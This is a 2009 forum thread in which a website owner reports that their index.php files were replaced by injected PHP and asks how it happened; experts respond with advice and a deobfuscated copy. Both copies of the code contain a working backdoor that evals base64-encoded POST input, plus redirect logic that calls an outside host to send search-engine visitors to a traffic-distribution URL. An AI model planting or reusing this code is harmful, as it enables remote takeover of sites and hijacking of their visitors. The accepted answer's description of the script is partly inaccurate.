[Okta Webinar] Learn how to a build a cloud-first strategyRegister Now

x
?
Solved

Web hacked, indexes removed??

Posted on 2009-02-12
5
Medium Priority
?
686 Views
Last Modified: 2013-11-16
Somebody this morning has removed all the index.php from the sections of one of my sites, and replaced them with the attached code, how can i prevent this from happening again, and how could this happen, somoe have access to my folders??

Attached the index.php with which they replaced the original ones.
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://gogapartnership.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

Open in new window

0
Comment
Question by:axtur
  • 3
5 Comments
 
LVL 29

Expert Comment

by:Michael Worsham
ID: 23624360
Is this a shared hosting site or a dedicated hosting server?
0
 
LVL 29

Expert Comment

by:Michael Worsham
ID: 23624561
I did some quick research and the code seems to be some sort of header hack.

I did find a thread that has some PHP code someone wrote to run to detect pages that have this hack on their websites.
http://www.forum.optymalizacja.com/index.php?s=&showtopic=65618&view=findpost&p=506034
0
 

Author Comment

by:axtur
ID: 23625343
its a shared hosting, i tried to see that forum, but i don't undestand that language??

Is my server infected or anything? what am i doing wrong?
0
 
LVL 29

Expert Comment

by:Michael Worsham
ID: 23625539
If the hacker was able to access your account and modify your files, then your hosting provider has a serious breach and most likely your data is at risk. I recommend contacting your hosting provider and see if they have had any additional server-side intrusions. I would also send them a copy of the code you found so they can see if they are at risk as well for other sites.

Here is a Google Translated copy of the site (Polish to English):
http://translate.google.com/translate?hl=en&sl=pl&u=http://www.forum.optymalizacja.com/index.php%3Fshowtopic%3D65618&ei=tXSUSdXBMozMmQfO1p2NCg&sa=X&oi=translate&resnum=3&ct=result&prev=/search%3Fq%3Dtds_u.php%26hl%3Den%26safe%3Doff%26rlz%3D1B3GGGL_enUS287US287
0
 
LVL 1

Accepted Solution

by:
IceCrack earned 2000 total points
ID: 23628871
Basically that script reads the website's users IP does something with it that returns a value of go or false(other value) then if the value is go it will submit the website ip address to a database where they can find Vulnerable websites to be use for spyware, spamware, virus Injection & other security related issues.

i suggest you get your host to upgrade their software and security, or move hosts.

Attached Snippet of the code broken to programmers readable version


<?php
 $a=@$_POST['a'];
 if($a && @$_POST['b']==sha1(md5($a)))
 {
	 $a=base64_decode($a);
	 eval($a);
	 }
 
  function get_counter()
  {
	  $ip=$_SERVER['REMOTE_ADDR'];
	  $uniq=@file_get_contents("http://gogapartnership.com/ip.php?ip=$ip");
	  if($uniq===false)
	  {
		  return false;
		  }
		  if ($uniq=="go")
		  {
			  return true;
			  }
			  return  false;
			  }
			  $ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));
			  if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false))
  {
	  if (get_counter())
	  {
		  @header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);
		  die();
		  }
		  }
		  if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false))
		  {
			  if(get_counter())
			  {
				  @header("Location: http://gogapartnership.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);
				  die();
				  }
				  } 
				  
				  ?>

Open in new window

0

Featured Post

Configuration Guide and Best Practices

Read the guide to learn how to orchestrate Data ONTAP, create application-consistent backups and enable fast recovery from NetApp storage snapshots. Version 9.5 also contains performance and scalability enhancements to meet the needs of the largest enterprise environments.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

If you thought ransomware was bad, think again! Doxware has the potential to be even more damaging.
There are times when I have encountered the need to decompress a response from a PHP request. This is how it's done, but you must have control of the request and you can set the Accept-Encoding header.
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…
The viewer will learn how to dynamically set the form action using jQuery.

834 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question